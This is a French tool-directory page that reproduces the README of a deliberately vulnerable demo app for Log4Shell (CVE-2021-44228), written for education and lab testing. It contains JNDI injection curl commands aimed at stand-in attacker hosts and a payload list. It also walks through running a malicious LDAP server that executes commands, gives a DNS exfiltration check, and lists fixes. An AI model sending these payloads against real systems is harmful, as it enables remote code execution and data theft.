Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j2-bugmaker — Demo of CVE-2021-44228 Log4Shell. | Kitploit
Outils/GitHubGitHub/mintimate/log4j2-bugmaker
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationRemote Access ToolLabs & Practice
GitHubmintimate/log4j2-bugmaker

log4j2-bugmaker

Demo of CVE-2021-44228 Log4Shell.

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4j2-BugMaker

Projet de démonstration de la vulnérabilité Log4Shell CVE-2021-44228

Ceci est un projet de démonstration destiné à l'étude et à la recherche sur la vulnérabilité d'exécution de code à distance Log4j2 (Log4Shell).

⚠️ Avertissement de sécurité

Ce projet est uniquement destiné à des fins de recherche en sécurité et d'éducation, ne pas utiliser en environnement de production !

Ce projet utilise la version Log4j 2.14.1 qui présente une grave faille de sécurité.

📋 Configuration de l'environnement

  • Spring Boot : 2.6.1
  • Log4j2 : 2.14.1 (version vulnérable)
  • Java : 8 (JDK 1.8)

🚀 Démarrage rapide

1. Compiler le projet

root@kitploit:~
./mvnw clean package

2. Exécuter l'application

root@kitploit:~
./mvnw spring-boot:run

Ou :

root@kitploit:~
java -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar

3. Accéder à l'application

Ouvrir un navigateur et aller à : http://localhost:8080

🎯 Points d'accès vulnérables

1. Injection dans l'en-tête User-Agent

root@kitploit:~
curl -H "User-Agent: \${jndi:ldap://attacker.com/a}" http://localhost:8080/api/log

2. Injection dans les paramètres de requête

root@kitploit:~
curl "http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a}"

3. Vérification de santé (non vulnérable)

root@kitploit:~
curl http://localhost:8080/api/health

💡 Principe de la vulnérabilité

Log4Shell (CVE-2021-44228) est une grave vulnérabilité dans Apache Log4j2. Lorsque l'application enregistre une saisie utilisateur contenant une chaîne de format spéciale, Log4j2 analyse les expressions de recherche JNDI, ce qu'un attaquant peut exploiter pour exécuter du code à distance.

Exemples de charge utile d'attaque

root@kitploit:~
${jndi:ldap://evil.com/a}
${jndi:rmi://evil.com/a}
${jndi:dns://evil.com/a}

Charges utiles de test (sûres)

root@kitploit:~
${java:version}
${java:os}
${env:PATH}

🔧 Étapes de test

  1. Démarrer l'application
  2. Envoyer une requête contenant une expression JNDI
  3. Consulter les logs de la console pour observer le comportement d'analyse de Log4j2

🛡️ Corrections

Solution 1 : Mettre à jour la version de Log4j2

Mettre à jour Log4j2 vers la version 2.17.1 ou ultérieure :

root@kitploit:~
<properties>
    <log4j2.version>2.17.1</log4j2.version>
</properties>

Solution 2 : Définir un paramètre JVM

root@kitploit:~
-Dlog4j2.formatMsgNoLookups=true

Solution 3 : Supprimer la classe JndiLookup

root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

🚀 Démonstration d'exécution de code à distance

Méthode 1 : Utiliser l'outil fourni (recommandé)

root@kitploit:~
# 1. Exécuter le script d'automatisation
./setup-exploit-server.sh

# 2. Choisir l'outil JNDI-Injection-Exploit
# 3. Saisir la commande à exécuter (ex. whoami ou cat /etc/hosts)
# 4. Dans un autre terminal, envoyer la charge utile d'attaque

Méthode 2 : Utiliser un serveur LDAP Python

root@kitploit:~
# Démarrer un serveur LDAP malveillant
python3 simple-ldap-server.py "whoami"

# Ou exécuter une autre commande
python3 simple-ldap-server.py "cat /etc/hosts"

# Dans un autre terminal, envoyer la charge utile d'attaque
curl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log

Méthode 3 : Vérification DNS exfiltration (sans serveur dédié)

root@kitploit:~
# Exécuter le script de test d'exfiltration DNS
./test-dns-exfiltration.sh

# Suivre les instructions, accéder à dnslog.cn pour obtenir un sous-domaine
# Puis vérifier si une requête DNS a été reçue

📚 Références

  • Détails CVE-2021-44228
  • Bulletin de sécurité Apache Log4j
  • Avertissement CISA
  • JNDI-Injection-Exploit
  • JNDIExploit

📝 Licence

Ce projet est sous licence MIT License.

Avis particulier : Ce projet est uniquement destiné à des fins éducatives et de recherche en sécurité. L'utilisateur assume seul les risques liés à son utilisation.

⚠️ Mentions légales

Effectuer des tests d'intrusion sur les systèmes d'autrui sans autorisation est illégal ! Ce projet est uniquement destiné à :

  • Être utilisé dans votre propre environnement de test
  • Être utilisé dans le cadre de tests de sécurité autorisés
  • Servir à des fins de recherche en sécurité et d'éducation

Veuillez respecter les lois et réglementations locales et utiliser ces connaissances de manière responsable.

Télécharger l’outil